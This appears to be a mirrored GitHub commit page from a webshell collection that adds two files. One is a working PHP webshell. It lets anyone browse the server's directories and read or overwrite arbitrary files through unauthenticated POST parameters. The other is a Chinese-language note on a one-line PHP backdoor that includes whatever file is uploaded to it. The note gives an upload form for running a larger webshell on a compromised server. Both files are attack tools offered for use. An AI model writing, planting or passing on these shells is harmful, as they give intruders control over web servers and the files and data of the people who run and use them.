mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
add
This commit is contained in:
tennc
parent
82ba3e540d
commit
9fea2a8727
2 changed files with 56 additions and 0 deletions
37
jsp/cat/test.php
Normal file
37
jsp/cat/test.php
Normal file
|
|
@ -0,0 +1,37 @@
|
|||
<?php
|
||||
echo "<form action=\"\" method=\"post\" id=\"fm\">";
|
||||
function getFile($path,$charset) {
|
||||
header("Content-Type:text/html;charset=".$charset);
|
||||
if (is_dir($path)) {
|
||||
$dir = opendir ( $path );
|
||||
while ( $file = readdir ( $dir ) ) {
|
||||
echo "<a href=\"javascript:get('".str_replace('\\','/',$path)."/".$file."');\">".$file."</a><br/>\n";
|
||||
}
|
||||
closedir($dir);
|
||||
} else {
|
||||
echo "File:<input type=\"text\" style=\"width:600px;\" name=\"file\" value=\"".$path."\" /><input type=\"button\" style=\"margin-left:20px;\" value=\"update\" onclick=\"update()\" /><span id=\"result\"></span><br/>";
|
||||
echo "<textarea style=\"width:800px;height:600px;\" name=\"data\">".file_get_contents($path)."</textarea>";
|
||||
}
|
||||
echo "<input type=\"hidden\" name=\"p\" id=\"p\" value=\"".$path."\"/><input type=\"hidden\" name=\"action\" id=\"action\" value=\"get\" /></form>";
|
||||
}
|
||||
function update($filename,$data){
|
||||
file_put_contents($filename, $data);
|
||||
echo "<script>history.back(-1);alert('ok');</script>";
|
||||
}
|
||||
if('update'==$_POST['action']){
|
||||
update($_POST['file'],$_POST['data']);
|
||||
}else{
|
||||
getFile($_POST['p']!=''?$_POST['p']:$_SERVER['DOCUMENT_ROOT'],$_POST['charset']!=''?$_POST['charset']:"UTF-8");
|
||||
}
|
||||
?>
|
||||
<script>
|
||||
function get(p){
|
||||
document.getElementById('p').value = p;
|
||||
document.getElementById('action').value = "get";
|
||||
document.getElementById('fm').submit();
|
||||
}
|
||||
function update(){
|
||||
document.getElementById('action').value = "update";
|
||||
document.getElementById('fm').submit();
|
||||
}
|
||||
</script>
|
||||
19
php/另类PHP一句话小马.md
Normal file
19
php/另类PHP一句话小马.md
Normal file
|
|
@ -0,0 +1,19 @@
|
|||
另类PHP一句话小马
|
||||
|
||||
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。
|
||||
|
||||
<?php @include($_FILES['u']['tmp_name']);
|
||||
|
||||
使用方式也简单构造一个html文件写入如下代码:
|
||||
|
||||
<form action="http:/a.b.c.com.cn/shell.php" method="POST" enctype="multipart/form-data">
|
||||
<input type="file" name='u'>
|
||||
<button>shell</button>
|
||||
</form>
|
||||
from: <a href="http://www.zeroplace.cn/">www.zeroplace.cn</a>
|
||||
|
||||
选择你的php大马点shell运行
|
||||
|
||||
我测试的时候的代码就是<?php phpinfo();保存的文件名为1.txt。
|
||||
|
||||
[url](http://www.zeroplace.cn/article.asp?id=906)
|
||||
Loading…
Reference in a new issue